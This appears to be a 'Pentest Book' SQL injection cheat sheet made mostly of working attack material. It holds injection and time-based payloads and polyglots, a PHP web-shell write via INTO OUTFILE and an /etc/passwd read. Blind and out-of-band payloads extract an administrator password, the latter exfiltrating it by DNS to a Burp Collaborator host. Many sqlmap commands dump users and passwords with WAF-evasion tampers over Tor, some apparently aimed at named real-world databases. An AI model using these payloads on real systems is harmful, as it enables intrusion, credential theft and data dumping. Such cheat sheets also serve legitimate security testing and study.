Pentest Book
SQLi
SQL injection cheat sheet | Web Security Academy
WebSecAcademy

Common

1
/?q=1
2
/?q=1'
3
/?q=1"
4
/?q=[1]
5
/?q[]=1
6
/?q=1`
7
/?q=1\
8
/?q=1/*'*/
9
/?q=1/*!1111'*/
10
/?q=1'||'asd'||' <== string concat (|| concatenates in Oracle/PostgreSQL/SQLite; in MySQL it is logical OR unless PIPES_AS_CONCAT is set, so the result silently differs instead of erroring)
11
/?q=1' or '1'='1
12
/?q=1 or 1=1
13
/?q='or''='
14
/?q=(1)or(0)=(1)
15
16
# Useful time-based payloads — match the backend: WAITFOR DELAY is MSSQL (T-SQL) only, sleep(5) is MySQL. Send a "true" variant and a control request; a delay only on the former confirms injection.
17
' WAITFOR DELAY '0:0:5'--
18
';WAITFOR DELAY '0:0:5'--
19
')) or sleep(5)='
20
;waitfor delay '0:0:5'--
21
);waitfor delay '0:0:5'--
22
';waitfor delay '0:0:5'--
23
";waitfor delay '0:0:5'--
24
');waitfor delay '0:0:5'--
25
");waitfor delay '0:0:5'--
26
));waitfor delay '0:0:5'--

Polyglot

1
' " ') ") ) . */ <!-- --   <== characters that close the surrounding string/bracket/comment context; try each and diff the response against a baseline request
2
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
3
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/

Resources by type

1
# MySQL:
2
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
3
https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/
4
5
# MSSQL:
6
http://evilsql.com/main/page2.php
7
http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
8
9
# ORACLE:
10
http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet
11
12
# POSTGRESQL:
13
http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet
14
15
# Others
16
http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
17
http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet
18
http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet
19
http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet
20
https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet
21
http://rails-sqli.org/
22
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

R/W files

1
# Read file (MySQL; requires the FILE privilege and a path allowed by secure_file_priv — LOAD_FILE returns NULL rather than an error when denied; match the column count of the original query)
2
UNION SELECT LOAD_FILE("/etc/passwd")-- 
3
4
# Write a file (MySQL; needs FILE privilege, a secure_file_priv-allowed directory writable by the DB process, and — to actually get code execution — a path under the web root; /tmp only proves the write. Use <?php, short_open_tag is commonly disabled)
5
UNION SELECT "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE "/tmp/shell.php"-- 

Blind SQLi

1
# Conditional Responses
2
3
# Request with:
4
Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4
5
6
In the database the query becomes:
7
SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4' -- if a row is returned the page shows "Welcome back", otherwise it does not; that single difference is the oracle
8
9
# To detect (compare the two responses):
10
TrackingId=x'+OR+1=1-- → "Welcome back" shown (TRUE)
11
TrackingId=x'+OR+1=2-- → not shown (FALSE)
12
# Does the user 'administrator' exist? (TRUE only if the UNION returns a row)
13
TrackingId=x'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'-- OK
14
# Password length (raise the comparison value until the response flips)
15
TrackingId=x'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+length(password)>1--
16
17
# Character-by-character extraction: the response is "Welcome back" when the first password character is greater than 'm', greater than 't', or equal to 's' respectively. Binary-search each position this way; §a§ marks the Burp Intruder payload position for the character set.
18
19
xyz' UNION SELECT 'a' FROM Users WHERE Username = 'Administrator' and SUBSTRING(Password, 1, 1) > 'm'--
20
xyz' UNION SELECT 'a' FROM Users WHERE Username = 'Administrator' and SUBSTRING(Password, 1, 1) > 't'--
21
xyz' UNION SELECT 'a' FROM Users WHERE Username = 'Administrator' and SUBSTRING(Password, 1, 1) = 's'--
22
z'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+substring(password,6,1)='§a§'--
23
24
# Force conditional responses
25
26
TrackingId=x'+UNION+SELECT+CASE+WHEN+(1=1)+THEN+to_char(1/0)+ELSE+NULL+END+FROM+dual-- RETURNS ERROR IF TRUE (Oracle: 1/0 is only evaluated when the CASE branch is taken; FROM dual is Oracle syntax)
27
TrackingId=x'+UNION+SELECT+CASE+WHEN+(1=2)+THEN+to_char(1/0)+ELSE+NULL+END+FROM+dual-- RETURNS NORMALLY IF FALSE
28
TrackingId='+UNION+SELECT+CASE+WHEN+(username='administrator'+AND+substr(password,3,1)='§a§')+THEN+to_char(1/0)+ELSE+NULL+END+FROM+users--;
29
30
# Time delays (pg_sleep = PostgreSQL, WAITFOR DELAY = MSSQL; the %3B / ; variants are stacked queries and only work where the driver allows them — the x'||pg_sleep(10)-- form is inline and does not need stacking)
31
TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
32
TrackingId=x'; IF (SELECT COUNT(username) FROM Users WHERE username = 'Administrator' AND SUBSTRING(password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'--
33
TrackingId=x'; IF (1=2) WAITFOR DELAY '0:0:10'--
34
TrackingId=x'||pg_sleep(10)--
35
TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
36
TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+substring(password,1,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
37
38
# Out-of-Band / OAST (Collaborator)
39
Use when the response gives no in-band signal (no content change, no timing). The database is made to resolve or fetch a hostname you control; any DNS/HTTP interaction on the Collaborator confirms injection, and data is exfiltrated inside the subdomain label.
40
41
# Confirm:
42
TrackingId=x'+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//x.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--
43
44
# Exfil:
45
TrackingId=x'; declare @p varchar(1024);set @p=(SELECT password FROM users WHERE username='Administrator');exec('master..xp_dirtree "//'+@p+'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a"')-- (MSSQL, stacked query; the value becomes a DNS label, so it must be ≤63 chars and hostname-safe — hex-encode it first if it contains other characters)
46
TrackingId=x'+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--

Second Order SQLi

1
# A second-order SQL Injection, on the other hand, is a vulnerability exploitable in two different steps:
2
1. Firstly, we STORE a particular user-supplied input value in the DB and
3
2. Secondly, we use the stored value to exploit a vulnerability in a vulnerable function in the source code which constructs the dynamic query of the web application.
4
5
# Example payload:
6
X' UNION SELECT user(),version(),database(), 4 --
7
X' UNION SELECT 1,2,3,4 --
8
9
# For example, in a password reset query with the stored username "User123' -- " (note the trailing space after -- in MySQL):
10
11
$pwdreset = mysql_query("UPDATE users SET password='getrekt' WHERE username='User123' -- ' and password='<old password>'");
12
13
# Will be:
14
15
$pwdreset = mysql_query("UPDATE users SET password='getrekt' WHERE username='User123'");
16
17
# So the old password never has to be known: the username was escaped (or parameterised) when it was INSERTed, but is later read back and concatenated into the UPDATE verbatim, and the comment sequence discards the password check. The stored value must survive the first write intact for this to work.
18
19
- User = ' or 'asd'='asd  → the WHERE clause always evaluates true
20
- User = admin'--  → everything after the username, including the password check, is commented out (trailing space after -- required in MySQL)

sqlmap

1
# Post
2
sqlmap -r search-test.txt -p tfUPass
3
4
# Get
5
sqlmap -u "http://10.11.1.111/index.php?id=1" --dbms=mysql
6
7
# Crawl
8
sqlmap -u http://10.11.1.111 --dbms=mysql --crawl=3
9
10
# Full auto - FORMS (--risk=3 enables OR-based tests that can modify or delete rows if the injection lands in an UPDATE/DELETE, and --batch accepts every prompt's default without asking — know both before running this against anything but a lab)
11
sqlmap -u 'http://10.11.1.111:1337/978345210/index.php' --forms --dbs --risk=3 --level=5 --threads=4 --batch
12
# Columns
13
sqlmap -u 'http://admin.cronos.htb/index.php' --forms --dbms=MySQL --risk=3 --level=5 --threads=4 --batch --columns -T users -D admin
14
# Values
15
sqlmap -u 'http://admin.cronos.htb/index.php' --forms --dbms=MySQL --risk=3 --level=5 --threads=4 --batch --dump -T users -D admin
16
17
sqlmap -o -u "http://10.11.1.111:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" --method=POST --level=3 --threads=10 --dbms=MySQL --users --passwords
18
19
# SQLMAP WAF bypass
20
21
sqlmap --level=5 --risk=3 --random-agent -v3 --batch --threads=10 --dbs   # --user-agent takes a value and is mutually exclusive with --random-agent; use one or the other
22
sqlmap --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" --dbs
23
sqlmap --dbms="MySQL" -v3 --technique U --tamper="space2comment" --dbs
24
sqlmap -v3 --technique=T --no-cast --fresh-queries --banner
25
sqlmap -u http://www.example.com/index?id=1 --level 2 --risk 3 --batch --dbs
26
27
28
sqlmap -f -b --current-user --current-db --is-dba --users --dbs
29
sqlmap --risk=3 --level=5 --random-agent -v3 --batch --threads=10 --dbs
30
sqlmap --risk 3 --level 5 --random-agent --proxy http://<your-proxy>:8080 --dbs   # only route through a proxy you control (e.g. Burp): an unknown third-party proxy sees the target, every payload and anything you dump
31
sqlmap --random-agent --dbms=MYSQL --dbs --technique=B
32
sqlmap --identify-waf --random-agent -v 3 --dbs   # --identify-waf has been dropped in recent sqlmap releases (WAF detection runs automatically); omit it if your version rejects it
33
34
1 : --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
35
2 : --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T '#__tabulizer_user_preferences' --columns --random-agent --level=5 --risk=3   # quote the table name: an unquoted # starts a shell comment; the option is --columns
36
37
sqlmap --threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D joomlab -T anz91_session -C session_id --dump
38
sqlmap --tables -D miss_db --is-dba --threads="10" --time-sec=10 --timeout=5 --no-cast --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent
39
sqlmap -u http://192.168.0.107/test.php?id=1 -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"
40
sqlmap --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2
41
sqlmap -v3 --dbms="MySQL" --risk=3 --level=3 --technique=BU --tamper="space2mysqlblank.py" --random-agent -D damksa_abr -T admin,jobadmin,member --columns
42
43
sqlmap --wizard
44
sqlmap --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql
45
sqlmap -u http://www.site.ps/index.php --level 5 --risk 3 --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql
46
sqlmap -u http://www.site.ps/index.php --level 5 --risk 3 --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql
47
48
# Tamper suggester
49
https://github.com/m4ll0k/Atlas
50
51
--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor --dbs --dbms "MySQL" --current-db --random-agent   # --check-tor verifies the circuit is actually in use; without it a dead Tor daemon means the scan goes out directly from your IP
52
--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" --tables
53
--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" --columns
54
--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" -C "ud,email,usuario,contra" --dump
55
# Tamper list (the original line is truncated here; run `sqlmap --list-tampers` for the full set and pick by target DBMS/WAF rather than stacking all of them)
56
between.py,charencode.py,charunicodeencode.py,equaltolike.py,greatest.py,multiplespaces.py,nonrecursivereplacement.py,percentage.py,…